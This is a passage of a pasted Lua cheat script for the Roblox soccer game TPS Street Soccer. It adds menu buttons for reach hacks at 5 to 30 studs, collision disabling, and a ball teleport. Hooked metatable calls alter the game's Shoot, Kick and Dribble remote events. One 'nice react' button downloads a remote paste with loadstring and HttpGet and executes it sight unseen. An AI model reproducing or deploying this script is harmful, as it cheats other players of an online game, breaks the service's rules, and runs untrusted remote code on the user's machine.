  423. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  424. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  425. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  426. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  427. end
  428. end
  429. end)
  430. end
  431. })
  432.  
  433. Tab:AddButton({
  434. Name = "5 studs left foot",
  435. Callback = function()
  436. getgenv().Leg = "Left" -- Left or Right
  437. getgenv().Reach = 5 -- Change to whatever you want (The game caps it)
  438. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  439. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  440. game["RunService"].Stepped:Connect(function()
  441. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  442. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  443. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  444. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  445. end
  446. end
  447. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  448. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  449. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  450. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  451. end
  452. end
  453. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  454. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  455. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  456. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  457. end
  458. end
  459. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  460. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  461. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  462. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  463. end
  464. end
  465. end)
  466. end
  467. })
  468.  
  469. Tab:AddButton({
  470. Name = "8 studs left foot",
  471. Callback = function()
  472. getgenv().Leg = "Left" -- Left or Right
  473. getgenv().Reach = 8 -- Change to whatever you want (The game caps it)
  474. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  475. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  476. game["RunService"].Stepped:Connect(function()
  477. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  478. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  479. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  480. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  481. end
  482. end
  483. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  484. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  485. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  486. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  487. end
  488. end
  489. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  490. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  491. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  492. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  493. end
  494. end
  495. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  496. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  497. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  498. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  499. end
  500. end
  501. end)
  502. end
  503. })
  504.  
  505. Tab:AddButton({
  506. Name = "15 studs left foot",
  507. Callback = function()
  508. getgenv().Leg = "Left" -- Left or Right
  509. getgenv().Reach = 15 -- Change to whatever you want (The game caps it)
  510. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  511. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  512. game["RunService"].Stepped:Connect(function()
  513. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  514. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  515. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  516. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  517. end
  518. end
  519. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  520. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  521. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  522. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  523. end
  524. end
  525. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  526. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  527. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  528. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  529. end
  530. end
  531. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  532. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  533. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  534. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  535. end
  536. end
  537. end)
  538. end
  539. })
  540.  
  541. Tab:AddButton({
  542. Name = "30 studs left foot",
  543. Callback = function()
  544. getgenv().Leg = "Left" -- Left or Right
  545. getgenv().Reach = 30 -- Change to whatever you want (The game caps it)
  546. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  547. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  548. game["RunService"].Stepped:Connect(function()
  549. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  550. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  551. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  552. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  553. end
  554. end
  555. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  556. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  557. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  558. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  559. end
  560. end
  561. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  562. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  563. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  564. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  565. end
  566. end
  567. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  568. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  569. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  570. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  571. end
  572. end
  573. end)
  574. end
  575. })
  576.  
  577.  
  578. --misc
  579. local Tab = Window:MakeTab({
  580. Name = "misc",
  581. Icon = "rbxassetid://4483345998",
  582. PremiumOnly = false
  583. })
  584.  
  585. --antiballfling
  586. Tab:AddButton({
  587. Name = "antiballfling",
  588. Callback = function()
  589. local speaker = game.Players.LocalPlayer
  590. local RunService = game:GetService("RunService")
  591. Clip = false
  592. wait(0.1)
  593. local function NoclipLoop()
  594. if Clip == false and speaker.Character ~= nil then
  595. for _, child in pairs(speaker.Character:GetDescendants()) do
  596. if child:IsA("BasePart") and child.CanCollide == true and child.Name == "Right Leg" or child.Name == "Right Arm" or child.Name == "Left Arm" or child.Name == "Right Arm" or child.Name == "Torso" then
  597. child.CanCollide = false
  598. end
  599. end
  600. end
  601. end
  602. Noclipping = RunService.Stepped:Connect(NoclipLoop)
  603. end
  604. })
  605.  
  606. --fpsbooster
  607. Tab:AddButton({
  608. Name = "fps booster",
  609. Callback = function()
  610. local decalsyeeted = true -- Leaving this on makes games look shitty but the fps goes up by at least 20.
  611. local g = game
  612. local w = g.Workspace
  613. local l = g.Lighting
  614. local t = w.Terrain
  615. t.WaterWaveSize = 0
  616. t.WaterWaveSpeed = 0
  617. t.WaterReflectance = 0
  618. t.WaterTransparency = 0
  619. l.GlobalShadows = false
  620. l.FogEnd = 9e9
  621. l.Brightness = 0
  622. settings().Rendering.QualityLevel = "Level01"
  623. for i, v in pairs(g:GetDescendants()) do
  624. if v:IsA("Part") or v:IsA("Union") or v:IsA("CornerWedgePart") or v:IsA("TrussPart") then
  625. v.Material = "Plastic"
  626. v.Reflectance = 0
  627. elseif v:IsA("Decal") or v:IsA("Texture") and decalsyeeted then
  628. v.Transparency = 1
  629. elseif v:IsA("ParticleEmitter") or v:IsA("Trail") then
  630. v.Lifetime = NumberRange.new(0)
  631. elseif v:IsA("Explosion") then
  632. v.BlastPressure = 1
  633. v.BlastRadius = 1
  634. elseif v:IsA("Fire") or v:IsA("SpotLight") or v:IsA("Smoke") then
  635. v.Enabled = false
  636. elseif v:IsA("MeshPart") then
  637. v.Material = "Plastic"
  638. v.Reflectance = 0
  639. v.TextureID = 10385902758728957
  640. end
  641. end
  642. for i, e in pairs(l:GetChildren()) do
  643. if e:IsA("BlurEffect") or e:IsA("SunRaysEffect") or e:IsA("ColorCorrectionEffect") or e:IsA("BloomEffect") or e:IsA("DepthOfFieldEffect") then
  644. e.Enabled = false
  645. end
  646. end
  647. end
  648. })
  649.  
  650.  
  651.  
  652.  
  653. --react tab
  654. local Tab = Window:MakeTab({
  655. Name = "react settings",
  656. Icon = "rbxassetid://4483345998",
  657. PremiumOnly = false
  658. })
  659.  
  660. Tab:AddButton({
  661. Name = "nice react",
  662. Callback = function()
  663. loadstring(game:HttpGet("https://paste.ee/r/q29Pj"))()
  664. end
  665. })
  666.  
  667.  
  668. --shoot
  669. Tab:AddButton({
  670. Name = "shoot",
  671. Callback = function()
  672. _G.Vector = Vector3.new(math.huge, math.huge, math.huge)
  673.  
  674. local mt = getrawmetatable(game);
  675. local old = mt.namecall
  676. setreadonly(mt,false)
  677. mt.namecall = newcclosure(function(remote,...)
  678. args = {...}
  679. method = tostring(getnamecallmethod())
  680. if method == "FireServer" and tostring(remote) == "Shoot" then
  681. args[6] = _G.Vector
  682. return old(remote,unpack(args))
  683. end
  684. return old(remote,...)
  685. end)
  686. setreadonly(mt,true)
  687. end
  688. })
  689.  
  690. --kick
  691. Tab:AddButton({
  692. Name = "kick",
  693. Callback = function()
  694. _G.Vector = Vector3.new(math.huge, math.huge, math.huge)
  695.  
  696. local mt = getrawmetatable(game);
  697. local old = mt.namecall
  698. setreadonly(mt,false)
  699. mt.namecall = newcclosure(function(remote,...)
  700. args = {...}
  701. method = tostring(getnamecallmethod())
  702. if method == "FireServer" and tostring(remote) == "Kick" then
  703. args[6] = _G.Vector
  704. return old(remote,unpack(args))
  705. end
  706. return old(remote,...)
  707. end)
  708. setreadonly(mt,true)
  709. end
  710. })
  711.  
  712. --dribble
  713. Tab:AddButton({
  714. Name = "dribble",
  715. Callback = function()
  716. local player = game:GetService("Players").LocalPlayer
  717.  
  718. local mt = getrawmetatable(game);
  719. local old = mt.namecall
  720. setreadonly(mt,false)
  721. mt.namecall = newcclosure(function(remote,...)
  722. args = {...}
  723. method = tostring(getnamecallmethod())
  724. if method == "FireServer" and tostring(remote) == "Dribble" then
  725.  
  726.  
  727. args[2] = player.Character.Humanoid.LLCL
  728.  
  729. return old(remote,unpack(args))
  730. end
  731. return old(remote,...)
  732. end)
  733. setreadonly(mt,true)
  734. end
  735. })
  736.  
  737.  
  738. --clickk!
  739. local Tab = Window:MakeTab({
  740. Name = "click!",
  741. Icon = "rbxassetid://4483345998",
  742. PremiumOnly = false
  743. })
  744.  
  745.  
  746. Tab:AddButton({
  747. Name = "Ball TP",
  748. Callback = function()
  749. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Workspace").TPSSystem.TPS.CFrame
  750. end
  751. })
  752.  
  753. --updates
  754. local Tab = Window:MakeTab({
  755. Name = "updates",
  756. Icon = "rbxassetid://4483345998",
  757. PremiumOnly = false
  758. })
  759.  
  760. Tab:AddParagraph("19.02.2023","Maked from me")
  761. Tab:AddParagraph("25.02.2023","Added react")
  762.  
  763.  
  764. --onlyAdmin
  765. local Tab = Window:MakeTab({
  766. Name = "onlyAdmin",
  767. Icon = "rbxassetid://4483345998",
  768. PremiumOnly = false
  769. })
  770.  
  771.  
  772. OrionLib:MakeNotification({
  773. Name = "tysm",
  774. Content = "yBloodz Tps Script",
  775. Image = "rbxassetid://4483345998",
  776. Time = 5
  777. })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement